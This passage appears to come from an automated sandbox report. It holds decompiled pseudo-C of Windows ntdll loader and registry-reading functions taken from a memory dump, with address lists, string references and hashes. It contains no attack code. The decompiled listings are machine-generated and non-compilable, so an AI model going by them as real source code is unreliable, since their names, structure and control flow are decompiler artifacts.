															E0460FFB0(_t118, _t156, 0x46e86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04639A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x04608799
0x0460879d
0x046087a1
0x046087a3
0x046087a8
0x046087c3
0x046087c3
0x046087c8
0x046087d1
0x046087d4
0x046087d8
0x046087e5
0x046087ec
0x04659bfe
0x04659c00
0x04659c02
0x04659c08
0x04659c0d
0x04659c0f
0x04659c14
0x04659c2d
0x04659c32
0x04659c37
0x04659c3a
0x04659c3c
0x04659c42
0x04659c42
0x04659c3c
0x04659c02
0x046087da
0x046087df
0x046087e3
0x00000000
0x00000000
0x046087e3
0x046087f2
0x00000000
0x046087fb
0x046087fd
0x046087fe
0x0460880e
0x0460880f
0x04608810
0x04608814
0x0460881a
0x0460881c
0x0460881f
0x04608821
0x04608822
0x04608824
0x04608826
0x0460882c
0x0460882e
0x04659c48
0x04659c48
0x04608834
0x04608834
0x04608837
0x00000000
0x00000000
0x04608837
0x0460882e
0x0460883d
0x04608840
0x04608843
0x04608846
0x04608849
0x0460884c
0x0460884e
0x04608850
0x04608852
0x04608854
0x04608857
0x046088b4
0x046088b6
0x046088b6
0x04608859
0x04608859
0x04608859
0x04608861
0x04608866
0x0460886a
0x0460893d
0x04608941
0x00000000
0x04608947
0x04608947
0x0460894a
0x0460894c
0x00000000
0x04608952
0x04608955
0x0460895a
0x0460895d
0x0460895d
0x0460895f
0x04608961
0x04608961
0x04608968
0x00000000
0x00000000
0x0460896a
0x0460896b
0x0460896e
0x00000000
0x04608970
0x04608970
0x04608970
0x04608970
0x04608972
0x04608972
0x04608974
0x00000000
0x0460897a
0x0460897a
0x0460897d
0x00000000
0x04608983
0x04659c65
0x04659c6d
0x04659c72
0x04659c75
0x04659c75
0x04659c82
0x04659c86
0x04659c87
0x04659c88
0x04659c89
0x04659c8c
0x04659c90
0x04659c95
0x04659c97
0x04659ca0
0x04659ca3
0x04659ca9
0x04659ca9
0x00000000
0x04659ca9
0x04659ca3
0x00000000
0x04659c97
0x0460897d
0x00000000
0x04608974
0x04608988
0x04608992
0x04608996
0x00000000
0x04608996
0x0460894c
0x00000000
0x04608870
0x0460887b
0x0460887d
0x0460887f
0x04608881
0x04608884
0x04608884
0x04608886
0x04608889
0x0460888c
0x0460888e
0x04608891
0x04608891
0x04608898
0x00000000
0x00000000
0x0460889a
0x0460889b
0x0460889e
0x00000000
0x00000000
0x046088a0
0x046088a8
0x046088b0
0x046088b2
0x046088d3
0x046088d5
0x00000000
0x046088d7
0x046088db
0x046088dc
0x046088e0
0x046088e8
0x046088ee
0x046088f0
0x046088f3
0x046088fc
0x04608901
0x04608906
0x0460890c
0x0460890c
0x0460890f
0x04608916
0x04608917
0x04608918
0x04608919
0x0460891a
0x0460891f
0x04608921
0x04659c52
0x04659c55
0x04659c5b
0x04659cac
0x04659cc0
0x04659cc0
0x04659c55
0x04608927
0x04608927
0x0460892f
0x04608933
0x00000000
0x046088f5
0x046088f5
0x00000000
0x046088f7
0x046088f7
0x046088fa
0x00000000
0x00000000
0x00000000
0x00000000
0x046088fa
0x046088f5
0x046088f3
0x00000000
0x046088d5
0x00000000
0x046088b2
0x046088c9
0x00000000
0x046088c9
0x0460887f
0x0460886a
0x04608857
0x04608852
0x046088bf
0x046088bf
0x046087aa
0x046087ad
0x046087ae
0x046087b4
0x046087b5
0x046087b6
0x046087b8
0x046087bd
0x046087c1
0x046087f4
0x046087fa
0x00000000
0x00000000
0x00000000
0x046087c1
0x00000000

Strings

LdrpDoPostSnapWork, xrefs: 04659C1E
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04659C18
minkernel\ntdll\ldrsnap.c, xrefs: 04659C28

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: d7f8627dd43744af557e813feab196bc133e4539efab0f9e63823c15d7e550d9
Instruction ID: 8e6de10c985456364ff4ca8960a972a6e2dbdea18c7075a49360ffbeb8354439
Opcode Fuzzy Hash: d7f8627dd43744af557e813feab196bc133e4539efab0f9e63823c15d7e550d9
Instruction Fuzzy Hash: 4791CFB1A00216EBEB2CEF99C481ABBB3B5FF54354B148169D905AB291F730BD05CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04607E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04607E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0460CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E045FC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x46e5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04675510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x46e5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04617D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04617D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04677016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04617D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04617D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04677016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0462A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E045FB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x04607e4c
0x04607e50
0x04607e55
0x04607e58
0x04607e5d
0x04607e71
0x04607f33
0x04607e77
0x04607e77
0x04607e79
0x04607e79
0x04607e7e
0x04607f45
0x04659848
0x00000000
0x04659848
0x04607f4e
0x04607f53
0x04607f5a
0x00000000
0x00000000
0x0465985a
0x04659862
0x04659866
0x00000000
0x0465986c
0x00000000
0x0465986c
0x04607e84
0x04607e84
0x04607e8d
0x04659871
0x04607eb8
0x04607ec0
0x04607ec0
0x04607e9a
0x0465987e
0x00000000
0x00000000
0x04659884
0x0465988b
0x046598a7
0x046598ac
0x046598b1
0x046598b6
0x046598b8
0x046598b8
0x046598b9
0x00000000
0x046598b9
0x04607ea0
0x04607ea7
0x00000000
0x00000000
0x04607eac
0x04607eb1
0x04607ec6
0x04607ed0
0x046598cc
0x04607ed6
0x04607ed6
0x04607ed6
0x04607ede
0x04607ee3
0x046598e3
0x046598f0
0x04659902
0x046598f2
0x046598fb
0x046598fb
0x04659907
0x0465991d
0x0465991d
0x04659907
0x046598e3
0x04607ef0
0x04607f14
0x04607f14
0x04607f1e
0x04659946
0x04607f24
0x04607f24
0x04607f24
0x04607f2c
0x0465996a
0x04659975
0x04659975
0x0465997e
0x04659993
0x04659993
0x0465997e
0x00000000
0x04607ef2
0x04607efc
0x04607f0a
0x04607f0e
0x04659933
0x00000000
0x04659933
0x00000000
0x04607f0e
0x00000000
0x00000000
0x00000000
0x04607eb1

Strings

LdrpCompleteMapModule, xrefs: 04659898
minkernel\ntdll\ldrmap.c, xrefs: 046598A2
Could not validate the crypto signature for DLL %wZ, xrefs: 04659891

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: e15dfcba4ebe8df812a7c96c0f18e98687cd244bcc875583d2427ed2291df5df
Instruction ID: 73a5dfe4e0d551000af0084f49eb7ff0ba58eabc78aeb8585843f79acf9bea7c
Opcode Fuzzy Hash: e15dfcba4ebe8df812a7c96c0f18e98687cd244bcc875583d2427ed2291df5df
Instruction Fuzzy Hash: 0951FD71A01745DBEB29CB68C944B2BBBE4EB00319F0846A9E8519B3E1F770FD01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 045FE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E045FE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E045FF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E046395D0();
						}
						if(_t78 != 0) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0463FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0463BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04639600();
					if(_t97 < 0) {
						goto L6;
					}
					E0463BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L045FF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0463BB40(_t83, _t102 + 0x24, _t78);
								if(L046043C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0463BB40(_t84, _t102 + 0x24, _t94);
									if(L046043C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x045fe620
0x045fe628
0x045fe62f
0x045fe631
0x045fe635
0x045fe637
0x045fe63e
0x04655503
0x04655503
0x045fe64c
0x045fe64c
0x045fe651
0x00000000
0x00000000
0x045fe661
0x045fe665
0x0465542a
0x045fe715
0x045fe71a
0x045fe71c
0x045fe720
0x045fe720
0x045fe727
0x045fe736
0x045fe736
0x045fe743
0x045fe743
0x045fe673
0x045fe678
0x045fe67d
0x045fe682
0x045fe685
0x045fe692
0x045fe69b
0x045fe6a3
0x045fe6ad
0x045fe6b1
0x045fe6b2
0x045fe6bb
0x045fe6bf
0x045fe6c0
0x045fe6c8
0x045fe6cc
0x045fe6d5
0x045fe6d9
0x00000000
0x00000000
0x045fe6e5
0x045fe6ea
0x045fe6f9
0x045fe70b
0x045fe70f
0x04655439
0x0465545e
0x0465545e
0x00000000
0x0465545e
0x0465543b
0x0465543e
0x04655440
0x04655445
0x04655472
0x04655475
0x0465548d
0x04655493
0x046554a9
0x00000000
0x00000000
0x046554ab
0x046554b4
0x046554bc
0x046554c8
0x046554de
0x046554fb
0x046554e0
0x046554e6
0x046554eb
0x046554eb
0x046554de
0x00000000
0x046554bc
0x04655477
0x0465547a
0x04655480
0x04655483
0x04655486
0x0465548b
0x00000000
0x00000000
0x00000000
0x0465548b
0x00000000
0x00000000
0x00000000
0x00000000
0x04655447
0x04655447
0x04655447
0x04655447
0x0465544e
0x00000000
0x00000000
0x04655450
0x04655452
0x04655455
0x0465545a
0x00000000
0x00000000
0x00000000
0x0465545c
0x0465546a
0x0465546d
0x0465546f
0x00000000
0x0465546f
0x045fe70f

Strings

InstallLanguageFallback, xrefs: 045FE6DB
@, xrefs: 045FE6C0
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 045FE68C

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 4f43b8bb6ef76d7b2ce35d6f52f291b6087a0901f47e50ac77d71762e12ac809
Instruction ID: c291129ac01b0639325361819558b795443dce273d11663e28630afa6c1eea44
Opcode Fuzzy Hash: 4f43b8bb6ef76d7b2ce35d6f52f291b6087a0901f47e50ac77d71762e12ac809
Instruction Fuzzy Hash: 6751D372505355ABD714DF24C844A6BB3E8BF98715F04092EF986D7360FB34E904C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 046BE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E046BE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E046BBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E046BBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E046BAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04639730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E046BA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E046BA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04639730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E046BA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E046BA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E04612280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0460B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0460FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E04617D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E046AFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x046be547
0x046be549
0x046be54f
0x046be553
0x046be557
0x046be55a
0x046be55c
0x046be55f
0x046be561
0x046be567
0x046be56b
0x046be7e2
0x00000000
0x046be571
0x046be575
0x046be577
0x046be57b
0x046be57c
0x046be57d
0x046be57e
0x046be57f
0x046be588
0x046be58f
0x046be591
0x046be592
0x046be592
0x046be596
0x046be59e
0x046be5a0
0x046be5a6
0x046be61d
0x046be61d
0x046be621
0x046be623
0x046be630
0x046be630
0x046be7e6
0x046be7eb
0x046be7ed
0x046be7f4
0x046be7fa
0x046be7ff
0x046be7ff
0x046be80a
0x046be812
0x046be812
0x046be5ab
0x046be5b4
0x046be5b9
0x046be5be
0x046be5c0
0x046be5c2
0x046be5c8
0x046be5c9
0x046be5cb
0x046be5cc
0x046be5d5
0x046be5e4
0x046be5f1
0x046be5f8
0x046be5f8
0x046be5d5
0x046be602
0x046be616
0x046be63d
0x046be644
0x046be64d
0x046be652
0x046be657
0x046be659
0x046be65b
0x046be661
0x046be662
0x046be664
0x046be665
0x046be66e
0x046be67d
0x046be68a
0x046be691
0x046be691
0x046be66e
0x046be6b0
0x00000000
0x046be6b6
0x046be6bd
0x046be6c7
0x046be6d7
0x046be6d9
0x046be6db
0x046be6de
0x046be6e3
0x046be6f3
0x046be6fc
0x046be700
0x046be700
0x046be704
0x046be70a
0x046be70a
0x046be713
0x046be716
0x046be719
0x046be720
0x046be761
0x046be76b
0x046be774
0x046be77a
0x046be77a
0x046be78a
0x046be791
0x046be799
0x046be79b
0x046be79f
0x046be7aa
0x046be7c0
0x046be7ac
0x046be7b2
0x046be7b9
0x046be7b9
0x046be7c7
0x046be806
0x00000000
0x046be7c9
0x046be7d1
0x046be7d8
0x00000000
0x046be7d8
0x00000000
0x00000000
0x046be722
0x046be72e
0x046be748
0x046be74c
0x046be754
0x046be756
0x046be75c
0x046be75c
0x00000000
0x046be75c
0x046be758
0x046be758
0x00000000
0x046be758
0x046be750
0x00000000
0x00000000
0x046be752
0x00000000
0x046be752
0x046be730
0x046be735
0x046be73d
0x046be73f
0x00000000
0x00000000
0x046be741
0x046be741
0x00000000
0x046be741
0x046be739
0x00000000
0x00000000
0x046be73b
0x00000000
0x046be73b
0x046be722
0x046be720
0x046be6b0
0x046be618
0x00000000
0x046be618

Strings

`, xrefs: 046BE670
`, xrefs: 046BE5D7

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 415c012f3ec78f7fa02559dadb8d51ddfaa26d93af5b81b0aca88f4aa9d39f70
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: B5919A322043419FE724CE65C841B9BB7E6AF94714F14892DF9D9CA280F776F844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 046751BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E046751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x46d05f0);
				E0464D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0460EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E046753CA(0);
						return E0464D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0463F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E04613690(1, _t117, 0x45d1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0463AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
